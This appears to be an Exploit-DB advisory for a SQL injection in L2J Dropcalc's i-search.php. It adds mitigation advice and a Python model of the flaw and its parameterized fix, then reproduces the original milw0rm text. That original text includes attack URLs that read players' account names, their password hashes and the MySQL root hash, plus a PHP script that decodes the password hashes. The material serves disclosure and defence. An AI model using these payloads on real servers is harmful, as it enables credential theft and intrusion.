Vendor: L2J Dropcalc
By: Codebreak
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: L2J Dropcalc
Affected Version From: <= v4
Affected Version To: <= v4
Patch Exists: No
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit: Not mentioned
Other Scripts: Not mentioned
Platforms Tested: Not mentioned

Michelle’s L2J Dropcalc

The vulnerability is a UNION-based SQL injection in the `itemid` parameter of `i-search.php`. The `username` and `token` parameters are not the injection point: they carry the attacker's own valid login and session token, so the attack requires an authenticated account on the site. Because `itemid` is concatenated into the item query unquoted, a value such as `-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "..."` (seven columns, matching the original SELECT) makes the page return attacker-chosen data in place of item details. The advisory below shows three reads: a player's account name from `characters`, that account's stored password from `accounts` (an L2J password is base64 of the raw SHA-1 digest, so it decodes to a SHA-1 hash; this read only works when the login server and game server share the database), and the `mysql.user` password hash for `root@localhost`, which only works if the web application itself connects to MySQL as root.

Mitigation:

Treat `itemid` as an integer and bind it with a prepared statement (or cast it to an integer before it reaches the query) rather than concatenating it into SQL. Independently of the query fix, run the calculator against a dedicated MySQL account that can only read the item tables it needs: with such an account the `accounts` and `mysql.user` reads shown in the advisory fail even if an injection remains. Keep the login server's `accounts` table out of reach of web-facing code, and if the application has ever connected as `root`, rotate that password, since its hash may already have been retrieved.
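The following is an added example, not code from the advisory or from the Dropcalc project. It models the `itemid` flaw and its fix in Python with an in-memory SQLite database: the `items` table and its seven columns are a constructed stand-in for whatever item table the real page queries (chosen so the seven-column UNION from the advisory lines up), while `characters(char_name, account_name)` and `accounts(login, password)` use the L2J names the advisory reads. The sample account row stores its password the L2J way, base64 of the raw SHA-1 digest, so the leaked value decodes to a SHA-1 hash exactly as the PHP decoder on this page does. Single-quoted string literals are used in the payloads because SQLite treats double-quoted strings as identifiers; MySQL accepts either.

```python
"""Model of the i-search.php itemid injection and its parameterized fix.

Added example (not the Dropcalc code). Schema is constructed: `items` is a
stand-in with seven columns; `characters` and `accounts` follow L2J names.
"""
import base64
import hashlib
import sqlite3


def l2j_password(plain: str) -> str:
    """L2J stores base64(SHA-1(password)); used here to build the sample row."""
    return base64.b64encode(hashlib.sha1(plain.encode()).digest()).decode()


def l2j_to_sha1_hex(stored: str) -> str:
    """Same transformation as the page's PHP decoder: base64 -> raw bytes -> hex."""
    return base64.b64decode(stored).hex()


def build_db() -> sqlite3.Connection:
    """Constructed sample data; every row here is made up for the demo."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    # Seven columns so the advisory's seven-column UNION lines up.
    cur.execute("CREATE TABLE items (item_id INTEGER, name TEXT, type TEXT, "
                "weight INTEGER, price INTEGER, crystal TEXT, grade TEXT)")
    cur.execute("INSERT INTO items VALUES (57, 'Adena', 'etc', 0, 1, 'none', 'none')")
    cur.execute("CREATE TABLE characters (char_name TEXT, account_name TEXT)")
    cur.execute("INSERT INTO characters VALUES ('Hero', 'hero_acct')")
    cur.execute("CREATE TABLE accounts (login TEXT, password TEXT)")
    cur.execute("INSERT INTO accounts VALUES (?, ?)",
                ("hero_acct", l2j_password("secret")))
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, itemid: str) -> list:
    """Reproduces the flaw: itemid is pasted into the statement unquoted."""
    sql = ("SELECT item_id,name,type,weight,price,crystal,grade "
           f"FROM items WHERE item_id = {itemid}")
    return conn.execute(sql).fetchall()


def lookup_fixed(conn: sqlite3.Connection, itemid: str) -> list:
    """Hardened: reject non-numeric input, then bind the value as a parameter."""
    if not itemid.isdigit():
        raise ValueError("itemid must be a non-negative integer")
    sql = ("SELECT item_id,name,type,weight,price,crystal,grade "
           "FROM items WHERE item_id = ?")
    return conn.execute(sql, (int(itemid),)).fetchall()


# Payloads from the advisory, with single-quoted literals for SQLite.
PAYLOAD_ACCOUNT = ("-1 UNION SELECT null,account_name,null,null,null,null,null "
                   "FROM characters WHERE char_name = 'Hero'")
PAYLOAD_PASSWORD = ("-1 UNION SELECT null,password,null,null,null,null,null "
                    "FROM accounts WHERE login = 'hero_acct'")


def demo() -> dict:
    """Run both payloads against the vulnerable and the fixed lookup."""
    conn = build_db()
    # The item query matches nothing (item_id = -1), so the only row returned
    # is the attacker's UNION row, with the stolen value in the `name` slot.
    leaked_account = lookup_vulnerable(conn, PAYLOAD_ACCOUNT)[0][1]
    leaked_stored = lookup_vulnerable(conn, PAYLOAD_PASSWORD)[0][1]
    try:
        lookup_fixed(conn, PAYLOAD_ACCOUNT)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "account": leaked_account,
        "stored": leaked_stored,
        "sha1": l2j_to_sha1_hex(leaked_stored),
        "fixed_blocks_payload": blocked,
        "fixed_normal_lookup": lookup_fixed(conn, "57")[0][1],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the block shows the vulnerable lookup handing back `hero_acct` and the base64 password, which decodes to the SHA-1 of `secret`, while the fixed lookup rejects the payload and still resolves a legitimate item id. The integer check is what matters for this parameter; the bound parameter is the general fix for the string-valued ones.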

Exploit-DB raw data:

#==============================================================================================
#  Title: Michelle's L2J Dropcalc
#  Version: <= v4
#  Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm
#
#  Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk)
#
#==============================================================================================
#  SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
#  http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[SQL]
#
#  Example:
#
#   Obtain a player username:
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
#   Obtain a password for that username (*** encrypted): 
#    * only valid if loginserver and gameserver are on the same machine
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[USERNAME]"
#
#
#  Bonus:
#   
#   Obtain MYSQL Password (encrypted):
#    *only valid if the script is executed with a root account.
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#
#   *** The L2J encrypted password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file
#
###############################################################################################


<--------- Beginning of PHP Script --------->

<style type="text/css">
<!--
.style3 {font-size: 24px}
.style1 {color: #CC0000}
-->
</style>
<?php
// L2J stores account passwords as base64(SHA-1(password)), so decoding the
// base64 and printing the raw bytes as hex yields the SHA-1 hash.
echo("<title>L2J Pass Decoding - POC</title>");
$pass = isset($_POST['decode']) ? trim($_POST['decode']) : '';
$unpass3 = base64_decode($pass, true);                 // strict mode: non-base64 input returns false
$unpass2 = ($unpass3 === false) ? '' : bin2hex($unpass3); // equivalent to unpack("H*", ...)[1]

echo("<span class=style1><b><u>Decoding Password</u></b></span>");

// Escape the echoed values so a pasted value is not reflected as HTML.
echo("<br><b>Base 64:</b> " . htmlspecialchars($pass, ENT_QUOTES) . "<br>");
echo("<b>Unpacked:</b> " . htmlspecialchars($unpass3 === false ? '' : $unpass3, ENT_QUOTES | ENT_SUBSTITUTE) . "<br>");
echo("<br><b>SHA1:</b> $unpass2<br>");
?>
<form name="form1" method="post" action="">
  <div align="center">
    <input type="text" name="decode">
    <input type="submit" value="Decode">
  </div>
</form>
<br><br><br><center><i>Created by Codebreak</i></center>

<------------- End of Script ------------->

# milw0rm.com [2007-01-31]